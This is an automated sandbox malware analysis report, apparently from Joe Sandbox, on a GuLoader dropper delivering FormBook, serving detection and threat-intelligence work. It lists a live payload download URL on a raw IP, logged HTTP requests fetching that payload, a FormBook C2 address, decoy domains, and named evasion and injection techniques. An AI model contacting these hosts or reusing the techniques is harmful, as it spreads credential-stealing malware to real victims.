Analysis Report POLITICALLY.exe

Overview

General Information

Sample Name: POLITICALLY.exe
Analysis ID: 411376
MD5: 80b3365808440838596864bd6d492c02
SHA1: ea14e621d263a3754234a65bc76cff61bf9eceab
SHA256: 8d6f73da5150cd26789a9a0e0643f69b520306680523d91cb21438ad2e6fa80c
Tags: exe
Infos:

Most interesting Screenshot:

Detection

FormBook GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Potential malicious icon found
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "http://111.90.149.46/bin_XNLhDlJvG218.bin"}
Source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.nortier.cloud/olg8/"], "decoy": ["onlinewomensclasses.com", "wiseowldigital.com", "morgolf.com", "bytriciacreations.com", "pamelaron.com", "ratilhabibullah.com", "productstoredt.com", "moopyo.com", "sundrygroup.com", "omenghafoods.online", "rentozo.com", "soakstress.xyz", "cunerier.com", "healthyandfestiveme.com", "paapfly.com", "seawincars.com", "trainsecure.com", "gobabybell.com", "oceanstaruae.com", "hhgrreg.com", "alohaarizonamassage.com", "policomercial.com", "polarishut.com", "takecontrol.house", "diamdima.com", "sullivandecarli.com", "6923599.com", "happinessisselfish.com", "excaliburbooks.com", "shabestantv.com", "mayer.show", "amydawkins.net", "bellymuse.com", "symmetricgym.info", "usatowservice.com", "emergeunbrken.network", "hifipromotion.com", "femboyshooters.com", "kvtlegal.net", "teamforce.pro", "drcconsultancy.com", "blvckgirls.com", "purplebean.company", "donedispute.com", "herbcart.site", "auroraleathers.com", "elefante8.com", "bdsmharness.com", "consulenzaweb.com", "onewtaxfree.com", "go-master.com", "tuancai.net", "importadoralosangeles.com", "mexueer.com", "easiersell.com", "mifeng6.info", "dgjrdk.com", "assroyalty.club", "healyagency.com", "thebridgestreetgallery.com", "artboxxstudio.com", "movingswap.com", "inovus-park.com", "prismatiq.tech"]}
Multi AV Scanner detection for submitted file
Source: POLITICALLY.exe Virustotal: Detection: 17% Perma Link
Source: POLITICALLY.exe ReversingLabs: Detection: 17%
Yara detected FormBook
Source: Yara match File source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, type: MEMORY
Antivirus or Machine Learning detection for unpacked file
Source: 23.2.control.exe.4fb518.1.unpack Avira: Label: TR/Dropper.Gen
Source: 23.2.control.exe.4d37960.4.unpack Avira: Label: TR/Dropper.Gen

Compliance:

barindex
Uses 32bit PE files
Source: POLITICALLY.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000013.00000000.532024048.000000000DC20000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: POLITICALLY.exe, 0000000A.00000002.560170779.000000001E32F000.00000040.00000001.sdmp, control.exe, 00000017.00000002.593834522.000000000491F000.00000040.00000001.sdmp
Source: Binary string: control.pdb source: POLITICALLY.exe, 0000000A.00000003.543429880.00000000008E3000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: POLITICALLY.exe, control.exe
Source: Binary string: control.pdbUGP source: POLITICALLY.exe, 0000000A.00000003.543429880.00000000008E3000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000013.00000000.532024048.000000000DC20000.00000002.00000001.sdmp

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\control.exe Code function: 4x nop then pop edi 23_2_030AC3ED
Source: C:\Windows\SysWOW64\control.exe Code function: 4x nop then pop ebx 23_2_030A6A95
Source: C:\Windows\SysWOW64\control.exe Code function: 4x nop then pop edi 23_2_030B565E

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.2.6:49744 -> 111.90.149.46:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.nortier.cloud/olg8/
Source: Malware configuration extractor URLs: http://111.90.149.46/bin_XNLhDlJvG218.bin
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /bin_XNLhDlJvG218.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 111.90.149.46Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: global traffic HTTP traffic detected: GET /bin_XNLhDlJvG218.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 111.90.149.46Cache-Control: no-cache
Source: POLITICALLY.exe, 0000000A.00000002.547813821.00000000008B9000.00000004.00000020.sdmp String found in binary or memory: http://111.90.149.46/bin_XNLhDlJvG218.bin
Source: POLITICALLY.exe, 0000000A.00000002.547813821.00000000008B9000.00000004.00000020.sdmp String found in binary or memory: http://111.90.149.46/bin_XNLhDlJvG218.bin/
Source: POLITICALLY.exe, 0000000A.00000002.547813821.00000000008B9000.00000004.00000020.sdmp String found in binary or memory: http://111.90.149.46/bin_XNLhDlJvG218.bin3
Source: POLITICALLY.exe, 0000000A.00000002.547813821.00000000008B9000.00000004.00000020.sdmp String found in binary or memory: http://111.90.149.46/bin_XNLhDlJvG218.binb)
Source: POLITICALLY.exe, 0000000A.00000002.547813821.00000000008B9000.00000004.00000020.sdmp String found in binary or memory: http://111.90.149.46/bin_XNLhDlJvG218.binw
Source: POLITICALLY.exe, 0000000A.00000002.547813821.00000000008B9000.00000004.00000020.sdmp String found in binary or memory: http://111.90.149.46/in_XNLhDlJvG218.bin
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.6923599.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.6923599.com/olg8/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.6923599.com/olg8/www.wiseowldigital.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.6923599.comReferer:
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.artboxxstudio.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.artboxxstudio.com/olg8/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.artboxxstudio.com/olg8/www.onlinewomensclasses.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.artboxxstudio.comReferer:
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.assroyalty.club
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.assroyalty.club/olg8/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.assroyalty.club/olg8/www.tuancai.net
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.assroyalty.clubReferer:
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.auroraleathers.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.auroraleathers.com/olg8/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.auroraleathers.com/olg8/www.artboxxstudio.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.auroraleathers.comReferer:
Source: explorer.exe, 00000013.00000000.507594698.000000000095C000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.cunerier.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.cunerier.com/olg8/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.cunerier.com/olg8/www.purplebean.company
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.cunerier.comReferer:
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.easiersell.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.easiersell.com/olg8/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.easiersell.com/olg8/www.assroyalty.club
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.easiersell.comReferer:
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.moopyo.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.moopyo.com/olg8/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.moopyo.com/olg8/www.morgolf.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.moopyo.comReferer:
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.morgolf.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.morgolf.com/olg8/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.morgolf.com/olg8/www.easiersell.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.morgolf.comReferer:
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.nortier.cloud
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.nortier.cloud/olg8/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.nortier.cloudReferer:
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.onlinewomensclasses.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.onlinewomensclasses.com/olg8/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.onlinewomensclasses.com/olg8/www.policomercial.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.onlinewomensclasses.comReferer:
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.policomercial.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.policomercial.com/olg8/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.policomercial.com/olg8/www.6923599.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.policomercial.comReferer:
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.prismatiq.tech
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.prismatiq.tech/olg8/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.prismatiq.tech/olg8/www.soakstress.xyz
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.prismatiq.techReferer:
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.purplebean.company
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.purplebean.company/olg8/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.purplebean.company/olg8/www.nortier.cloud
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.purplebean.companyReferer:
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.soakstress.xyz
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.soakstress.xyz/olg8/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.soakstress.xyz/olg8/www.moopyo.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.soakstress.xyzReferer:
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.tuancai.net
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.tuancai.net/olg8/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.tuancai.net/olg8/www.auroraleathers.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.tuancai.netReferer:
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.wiseowldigital.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.wiseowldigital.com/olg8/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.wiseowldigital.com/olg8/www.cunerier.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://www.wiseowldigital.comReferer:
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Potential malicious icon found
Source: initial sample Icon embedded in PE file: bad icon match: 20047c7c70f0e004
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\POLITICALLY.exe Process Stats: CPU usage > 98%
Contains functionality to call native functions
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0222E459 NtProtectVirtualMemory, 2_2_0222E459
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0222EB73 NtMapViewOfSection, 2_2_0222EB73
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221AE71 NtWriteVirtualMemory, 2_2_0221AE71
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221DC36 NtAllocateVirtualMemory, 2_2_0221DC36
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0222F270 NtMapViewOfSection, 2_2_0222F270
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221E245 NtAllocateVirtualMemory, 2_2_0221E245
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221B24A NtWriteVirtualMemory, 2_2_0221B24A
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221E378 NtAllocateVirtualMemory, 2_2_0221E378
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221B3D0 NtWriteVirtualMemory, 2_2_0221B3D0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0222F3D4 NtMapViewOfSection, 2_2_0222F3D4
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221B121 NtWriteVirtualMemory, 2_2_0221B121
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0222F658 NtMapViewOfSection, 2_2_0222F658
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221B698 NtWriteVirtualMemory, 2_2_0221B698
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0222F768 NtMapViewOfSection, 2_2_0222F768
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221B7FC NtWriteVirtualMemory, 2_2_0221B7FC
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221B514 NtWriteVirtualMemory, 2_2_0221B514
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0222F519 NtMapViewOfSection, 2_2_0222F519
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221BA7C NtWriteVirtualMemory, 2_2_0221BA7C
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221DB19 NtAllocateVirtualMemory, 2_2_0221DB19
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_02212B60 NtWriteVirtualMemory, 2_2_02212B60
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221BBB2 NtWriteVirtualMemory, 2_2_0221BBB2
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0222EB8C NtMapViewOfSection, 2_2_0222EB8C
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0222F896 NtMapViewOfSection, 2_2_0222F896
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221B932 NtWriteVirtualMemory, 2_2_0221B932
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221BE0D NtWriteVirtualMemory, 2_2_0221BE0D
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221AE76 NtWriteVirtualMemory, 2_2_0221AE76
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221CEAB NtWriteVirtualMemory, 2_2_0221CEAB
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0222EF21 NtMapViewOfSection, 2_2_0222EF21
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221BF4D NtWriteVirtualMemory, 2_2_0221BF4D
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221AFD8 NtWriteVirtualMemory, 2_2_0221AFD8
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221DFD8 NtAllocateVirtualMemory, 2_2_0221DFD8
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221BCDC NtWriteVirtualMemory, 2_2_0221BCDC
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0222EDB9 NtMapViewOfSection, 2_2_0222EDB9
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221DD81 NtAllocateVirtualMemory, 2_2_0221DD81
